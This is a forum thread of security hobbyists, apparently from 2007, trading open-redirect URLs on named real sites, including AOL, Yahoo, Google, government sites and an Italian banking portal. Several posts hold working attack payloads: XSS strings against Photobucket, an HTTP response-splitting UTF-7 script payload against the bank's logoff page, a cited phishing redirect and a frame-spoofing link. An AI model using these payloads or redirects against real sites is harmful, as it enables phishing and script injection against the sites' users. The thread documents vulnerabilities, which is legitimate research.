http://http.edge.ru4.com/smartserve/ttplus?placement=tp-1125-033&target=http://www.google.com

-tx @ lowtech-labs.org

Just saw this beauty in my inbox (takes you to a phishing site):

http://www.aol.com/ams/clickThruRedirect.adp?1073762100,2147779757x2147568413,http://0xca.0x47.0x6b.0xd9/~acid/www.moneybookers.com/index.htm

- RSnake
Gotta love it. http://ha.ckers.org

lol nice.

http://club.pchome.net/rd.php?pid=137&tag=club_update_1&tgt=http://www.google.com

-tx @ lowtech-labs.org

http://www.pbs.org/teachersource/previews/redir/http://www.google.com
[[url=http://www.indiapress.org/directory/redirect/r.php?a=http:--www.google.com]www.indiapress.org[/url]]
[[url=http://www.madaboutjewellery.com/cgi-bin/click.cgi?link=www.google.com]www.madaboutjewellery.com[/url]]

http://www.kmstudio.com.ua/index.htm?http://www.google.com/

It is an XSS at the same time but who cares...

http://www.merck.com/htbin/redirects/redirector.pl?url=http://www.google.com
Same with this one (redirect/xss)

-tx @ lowtech-labs.org

this one is probably listed somewhere, but im too tired to check all the pages :O

http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=http://www.asdf.com

you can enter javascript:(bla) too but you will need to use some SE to make them click the link (you will understand when you try..)

http://www.sbc.net/redirect.asp?url=http://www.asdf.com

http://www.webmasterworld.com/re4.cgi?f=&d=&url=HTTP://www.google.com

http://www.ojjdp.ncjrs.gov/exit.asp?go=1&url=http://www.google.com
They actually thought the go=1/0 thingy was going to stop redirects ;x -smashes head on table-

http://wwwm.meebo.com/redirect.php?http://www.hiredhacker.com

-peavey

--------------------------
http://www.hiredhacker.com

http://rds.yahoo.com/_ylt=A0geu9xGJ.dFshUA1TCl87UF/SIG=11qsb76n0/EXP=1172863174/**http://www.pentagon.gov

yahoo! another redirect on yahoo. they have a patch for the other areas of the site. Kinda weird they didn't patch this.

That's really weird, the parameters are actually ignored. http://rds.yahoo.com/**http://www.google.com is enough, it will redirect to anything. That looks like a temporary malfunction, I tried this only two days ago and it would show a warning page.

Edit: rd.yahoo.com shows a warning but rds.yahoo.com doesn't. LOL



Edited 1 time(s). Last edit at 03/08/2007 09:10AM by trev.

[removed]

Microsoft secure? Nooo way :P

And AOL too

http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100124311x1116333809x1077456677&_url=http://www.pentagon.gov



Edited 1 time(s). Last edit at 03/02/2007 06:51AM by Spyware.

http://www.usashopcn.com/dg.asp?url=http://www.pentagon.gov

opens site in frame.

http://www.defendamerica.mil/cgi-bin/bye.cgi?http://www.google.com/

.mil =]

[search.msdn.microsoft.com]

From a lurker:


I have found an interesting url redirect in the italian postepay card web site.

The interesting thing is the at today, there are developers that don't care about possible url encoding. So the result is that this url doesn't work:

https://bancopostaonline.poste.it/bpol/comuni/bpollogoff.asp?goto=http://www.google.com

because the / characters are stripped, instead the following url works:

https://bancopostaonline.poste.it/bpol/comuni/bpollogoff.asp?goto=http:%2f%2fwww.google.com

I contact you, beacause I understand that a url redirection in a web site search engine is not so bad, but in this case (a simil bank web site) the problem is not acceptable, also because on the web site there is a beautiful flash demo anti-phishing http://www.poste.it/online/phishing_video.shtml :)

oh, of course I have say nothing about this problem at the web site administrator :)

Ciao,
s4tan

That's HTTP Response Splitting as well:

https://bancopostaonline.poste.it/bpol/comuni/logoff.fcc?goto=%0AContent-Type:%20text/html;%20charset=UTF-7%0A%0A%2BADw%2Dscript%2BAD4%2Dalert(%22XSS%22);%2BADw%2D%2Fscript%2BAD4%2D

From BeNi:

http://www.google.com/local/add/changeLocale?currentLocation=http%3A%2F%2Fwww.mybeNi.tk&selectLocale=de_DE

- RSnake
Gotta love it. http://ha.ckers.org

http://photobucket.com/images/0;url=HACKER%22http-equiv=refresh%3E

Can't quite get it to work right yet. Using forward slashes break it. I tried to get it to redirect to a picture in my album, but it escapes the quote so it doesn't work right.

http://friends.newtelligence.net/clemensv/ct.ashx?url=http://google.com/

http://photobucket.com/images/0;url=http:%5Cgoogle.com%22%20http-equiv=refresh/ - works in Internet Explorer (it converts backwards slashes into forward slashes)

But it is probably easier to XSS this site:http://photobucket.com/images/%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E/

Very nice, haha!

- RSnake
Gotta love it. http://ha.ckers.org

For the stile-pr0n lovers: http://x.stilenet.com/x/out.php?http://www.google.com

-tx @ lowtech-labs.org

http://msxml.infospace.com/home/clickit/search?rawto=http://www.google.com

-tx @ lowtech-labs.org

http://news.google.com/news/url?sa=t&ct=us/5-1-0&fp=45f2d398d4ff6b31&ei=U2vyRcGuC5PqqAOevuCcCg&url=http://ha.ckers.org

http://www.redirect.to.url.com/search/result?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

All those parked domains, they must be good for something...

http://mopedshops.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://strippokerschool.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://onlinepkoergame.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://german-pinschers.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://kentuckywines.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://atv-store.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://free-magic.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/

4.700 more of those: http://www.ultimatedomains.com/
And another 500.000: http://www.fabulousdomains.com/

http://ageusa.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://aimus.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://myaddress.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://franchises.tv/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn

Hundreds more of those: http://www.google.com/search?q=%22This+domain+is+for+sale.+Please+contact+us+for+more+information.%22. Try to crack the "code" :)



Edited 3 time(s). Last edit at 03/10/2007 11:09PM by trev.

not really a redirect, but perfect frame spoofing (requires malware aka JavaScript enabled:)

http://www.kreditwerk.de/opener.html?kat=nav_links_UNSERUNTERNEHMEN__?cont=http://ha.ckers.org/images/stallowned.jpg